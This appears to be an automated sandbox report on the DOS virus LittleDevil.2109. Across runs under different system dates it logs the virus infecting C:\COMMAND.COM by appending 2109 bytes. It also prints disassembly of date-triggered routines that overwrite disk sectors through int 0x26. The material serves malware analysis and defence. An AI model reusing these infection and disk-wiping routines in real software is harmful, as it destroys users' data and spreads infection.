Sample viewer

vx.netlux.org/Virus.DOS.LittleDevil.2109

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:42:25.645855141Z 22 PC: 12de1 | Create or truncate file
2018-12-17T22:42:25.647744282Z 11 PC: 12de5 | Get input status
2018-12-17T22:42:25.651017433Z 250 PC: 12ded | UNKNOWN!
2018-12-17T22:42:25.652022154Z 75 PC: 12fad | Execute program
2018-12-17T22:42:25.653932732Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc
0x12fc4: jne 0x12fe6
0x12fc6: cmp dl, 0x18
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19
0x12fcd: int 0x21
0x12fcf: mov dx, 0
0x12fd2: mov cx, 0x10
0x12fd5: mov bx, 0
0x12fd8: int 0x26
0x12fda: mov ah, 9
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1
0x12fe3: jmp 0x133c5
0x12fe6: mov ah, 0x2a
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
2018-12-17T22:42:25.657375327Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb
0x12ff6: mov ah, 0x2a
0x12ff8: int 0x21
0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
2018-12-17T22:42:25.660282565Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020
0x13022: jmp 0x133c5
0x13025: mov ah, 0x2a
0x13027: int 0x21
0x13029: cmp dh, 0xb
2018-12-17T22:42:25.663240361Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19
0x13035: int 0x21
0x13037: mov dx, 0
0x1303a: mov cx, 0x10
0x1303d: mov bx, 0
0x13040: int 0x26
0x13042: mov ah, 9
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049
0x1304b: jmp 0x133c5
0x1304e: mov ax, 0xffff
0x13051: mov ds, ax
0x13053: push cs
0x13054: pop es
0x13055: xor si, si
2018-12-17T22:42:25.667481774Z 74 PC: 130dd | Reallocate memory
2018-12-17T22:42:25.669595203Z 74 PC: 12e31 | Reallocate memory
2018-12-17T22:42:25.670851896Z 72 PC: 12e3a | Allocate memory
2018-12-17T22:42:25.673501177Z 67 PC: 130e4 | Get or set file attributes
2018-12-17T22:42:25.679030718Z 61 PC: 130e4 | Open file (Filename = 'C:\COMMAND.COM')
2018-12-17T22:42:25.685226938Z 87 PC: 130e4 | Get or set file date and time
2018-12-17T22:42:25.687332142Z 63 PC: 130e4 | Read file or device (Read 24 bytes on handle 5)
2018-12-17T22:42:25.690097872Z 66 PC: 130e4 | Move file pointer
2018-12-17T22:42:25.69146839Z 64 PC: 130e4 | Write file or device (Write 11 bytes on handle 5)
2018-12-17T22:42:25.695486218Z 64 PC: 130e4 | Write file or device (Write 2109 bytes on handle 5)
2018-12-17T22:42:26.221635804Z 66 PC: 130e4 | Move file pointer
2018-12-17T22:42:26.223600953Z 64 PC: 130e4 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:42:26.227574652Z 87 PC: 130e4 | Get or set file date and time
2018-12-17T22:42:26.229452062Z 62 PC: 130e4 | Close file
2018-12-17T22:42:26.236796705Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-17T22:42:26.24240607Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.09751664Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.099415041Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.102125801Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.102927025Z 75 PC: 12fad | Execute program
2018-12-25T12:01:49.104499277Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc
0x12fc4: jne 0x12fe6
0x12fc6: cmp dl, 0x18
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19
0x12fcd: int 0x21
0x12fcf: mov dx, 0
0x12fd2: mov cx, 0x10
0x12fd5: mov bx, 0
0x12fd8: int 0x26
0x12fda: mov ah, 9
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1
0x12fe3: jmp 0x133c5
0x12fe6: mov ah, 0x2a
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
2018-12-25T12:01:49.109470847Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb
0x12ff6: mov ah, 0x2a
0x12ff8: int 0x21
0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
2018-12-25T12:01:49.111694528Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020
0x13022: jmp 0x133c5
0x13025: mov ah, 0x2a
0x13027: int 0x21
0x13029: cmp dh, 0xb
2018-12-25T12:01:49.114291189Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19
0x13035: int 0x21
0x13037: mov dx, 0
0x1303a: mov cx, 0x10
0x1303d: mov bx, 0
0x13040: int 0x26
0x13042: mov ah, 9
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049
0x1304b: jmp 0x133c5
0x1304e: mov ax, 0xffff
0x13051: mov ds, ax
0x13053: push cs
0x13054: pop es
0x13055: xor si, si
2018-12-25T12:01:49.117811199Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.1197477Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.121304628Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.123677603Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.129525029Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.137105467Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.13989934Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.143068276Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.144855399Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.149579298Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.142995699Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:51.144639677Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.147851257Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:51.150131987Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:51.293042614Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:51.299277734Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.094264688Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.096802688Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.100448056Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.101500375Z 75 PC: 12fad | Execute program
2018-12-25T12:01:49.103358778Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc
0x12fc4: jne 0x12fe6
0x12fc6: cmp dl, 0x18
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19
0x12fcd: int 0x21
0x12fcf: mov dx, 0
0x12fd2: mov cx, 0x10
0x12fd5: mov bx, 0
0x12fd8: int 0x26
0x12fda: mov ah, 9
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1
0x12fe3: jmp 0x133c5
0x12fe6: mov ah, 0x2a
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
2018-12-25T12:01:49.105800455Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb
0x12ff6: mov ah, 0x2a
0x12ff8: int 0x21
0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
2018-12-25T12:01:49.108291019Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020
0x13022: jmp 0x133c5
0x13025: mov ah, 0x2a
0x13027: int 0x21
0x13029: cmp dh, 0xb
2018-12-25T12:01:49.110676383Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19
0x13035: int 0x21
0x13037: mov dx, 0
0x1303a: mov cx, 0x10
0x1303d: mov bx, 0
0x13040: int 0x26
0x13042: mov ah, 9
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049
0x1304b: jmp 0x133c5
0x1304e: mov ax, 0xffff
0x13051: mov ds, ax
0x13053: push cs
0x13054: pop es
0x13055: xor si, si
2018-12-25T12:01:49.113978391Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.115951542Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.117373326Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.119764364Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.125858461Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.133361071Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.135416245Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.138518092Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.140286292Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.144687269Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.142762168Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:51.144272255Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.14775906Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:51.149322279Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:51.292827066Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:51.300547444Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":24,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.159438504Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.162501556Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.165538463Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.166624535Z 75 PC: 12fad | Execute program
2018-12-25T12:01:49.168162053Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc
0x12fc4: jne 0x12fe6
0x12fc6: cmp dl, 0x18
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19
0x12fcd: int 0x21
0x12fcf: mov dx, 0
0x12fd2: mov cx, 0x10
0x12fd5: mov bx, 0
0x12fd8: int 0x26
0x12fda: mov ah, 9
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1
0x12fe3: jmp 0x133c5
0x12fe6: mov ah, 0x2a
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
2018-12-25T12:01:49.171125231Z 25 PC: 12fcf | Get default drive
2018-12-25T12:01:51.142665178Z 9 PC: 12fe1 | Display string (Could not find end pointer)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.284425404Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.286528705Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.289559446Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.290453834Z 75 PC: 12fad | Execute program
2018-12-25T12:01:49.292484898Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc
0x12fc4: jne 0x12fe6
0x12fc6: cmp dl, 0x18
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19
0x12fcd: int 0x21
0x12fcf: mov dx, 0
0x12fd2: mov cx, 0x10
0x12fd5: mov bx, 0
0x12fd8: int 0x26
0x12fda: mov ah, 9
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1
0x12fe3: jmp 0x133c5
0x12fe6: mov ah, 0x2a
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
2018-12-25T12:01:49.294835129Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb
0x12ff6: mov ah, 0x2a
0x12ff8: int 0x21
0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
2018-12-25T12:01:49.297130979Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020
0x13022: jmp 0x133c5
0x13025: mov ah, 0x2a
0x13027: int 0x21
0x13029: cmp dh, 0xb
2018-12-25T12:01:49.299828839Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19
0x13035: int 0x21
0x13037: mov dx, 0
0x1303a: mov cx, 0x10
0x1303d: mov bx, 0
0x13040: int 0x26
0x13042: mov ah, 9
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049
0x1304b: jmp 0x133c5
0x1304e: mov ax, 0xffff
0x13051: mov ds, ax
0x13053: push cs
0x13054: pop es
0x13055: xor si, si
2018-12-25T12:01:49.302731766Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.304550723Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.306092589Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.3084792Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.31481176Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.321989375Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.331237481Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.33409264Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.335552614Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.339753487Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.142731538Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:51.14475666Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.149453146Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:51.152021808Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:51.303602487Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:51.310276889Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.436675385Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.438412563Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.440175706Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.440976716Z 75 PC: 12fad | Execute program
2018-12-25T12:01:49.442777739Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc
0x12fc4: jne 0x12fe6
0x12fc6: cmp dl, 0x18
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19
0x12fcd: int 0x21
0x12fcf: mov dx, 0
0x12fd2: mov cx, 0x10
0x12fd5: mov bx, 0
0x12fd8: int 0x26
0x12fda: mov ah, 9
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1
0x12fe3: jmp 0x133c5
0x12fe6: mov ah, 0x2a
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
2018-12-25T12:01:49.444927967Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb
0x12ff6: mov ah, 0x2a
0x12ff8: int 0x21
0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
2018-12-25T12:01:49.446876326Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020
0x13022: jmp 0x133c5
0x13025: mov ah, 0x2a
0x13027: int 0x21
0x13029: cmp dh, 0xb
2018-12-25T12:01:49.449146242Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19
0x13035: int 0x21
0x13037: mov dx, 0
0x1303a: mov cx, 0x10
0x1303d: mov bx, 0
0x13040: int 0x26
0x13042: mov ah, 9
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049
0x1304b: jmp 0x133c5
0x1304e: mov ax, 0xffff
0x13051: mov ds, ax
0x13053: push cs
0x13054: pop es
0x13055: xor si, si
2018-12-25T12:01:49.456140855Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.457358994Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.458648926Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.460045898Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.463605425Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.468018305Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.476842419Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.478837733Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.479918513Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.48279665Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:50.340383517Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:50.342926145Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:50.347053244Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:50.349086231Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:50.459489544Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:50.466586388Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":25,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.476243137Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.487330869Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.490115201Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.491137857Z 75 PC: 12fad | Execute program
2018-12-25T12:01:49.493145168Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc
0x12fc4: jne 0x12fe6
0x12fc6: cmp dl, 0x18
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19
0x12fcd: int 0x21
0x12fcf: mov dx, 0
0x12fd2: mov cx, 0x10
0x12fd5: mov bx, 0
0x12fd8: int 0x26
0x12fda: mov ah, 9
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1
0x12fe3: jmp 0x133c5
0x12fe6: mov ah, 0x2a
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
2018-12-25T12:01:49.495693643Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb
0x12ff6: mov ah, 0x2a
0x12ff8: int 0x21
0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
2018-12-25T12:01:49.498359974Z 25 PC: 12fcf | Get default drive
2018-12-25T12:01:50.340534384Z 9 PC: 12fe1 | Display string (Could not find end pointer)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.494925785Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.496710538Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.499315541Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.500221387Z 75 PC: 12fad | Execute program
2018-12-25T12:01:49.502007763Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc
0x12fc4: jne 0x12fe6
0x12fc6: cmp dl, 0x18
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19
0x12fcd: int 0x21
0x12fcf: mov dx, 0
0x12fd2: mov cx, 0x10
0x12fd5: mov bx, 0
0x12fd8: int 0x26
0x12fda: mov ah, 9
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1
0x12fe3: jmp 0x133c5
0x12fe6: mov ah, 0x2a
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
2018-12-25T12:01:49.504677255Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb
0x12ff6: mov ah, 0x2a
0x12ff8: int 0x21
0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
2018-12-25T12:01:49.506636292Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0
0x13008: jne 0x13025
0x1300a: mov ah, 0x19
0x1300c: int 0x21
0x1300e: mov dx, 0
0x13011: mov cx, 0x10
0x13014: mov bx, 0
0x13017: int 0x26
0x13019: mov ah, 9
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020
0x13022: jmp 0x133c5
0x13025: mov ah, 0x2a
0x13027: int 0x21
0x13029: cmp dh, 0xb
2018-12-25T12:01:49.508867996Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19
0x13035: int 0x21
0x13037: mov dx, 0
0x1303a: mov cx, 0x10
0x1303d: mov bx, 0
0x13040: int 0x26
0x13042: mov ah, 9
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049
0x1304b: jmp 0x133c5
0x1304e: mov ax, 0xffff
0x13051: mov ds, ax
0x13053: push cs
0x13054: pop es
0x13055: xor si, si
2018-12-25T12:01:49.511976565Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.513826147Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.515298379Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.518058982Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.523957993Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.530083186Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.531937255Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.534419472Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.535785198Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.539245908Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:50.459345028Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:50.461077453Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:50.465069011Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:50.467935808Z 62 PC: 130e4 | Close file (See above)
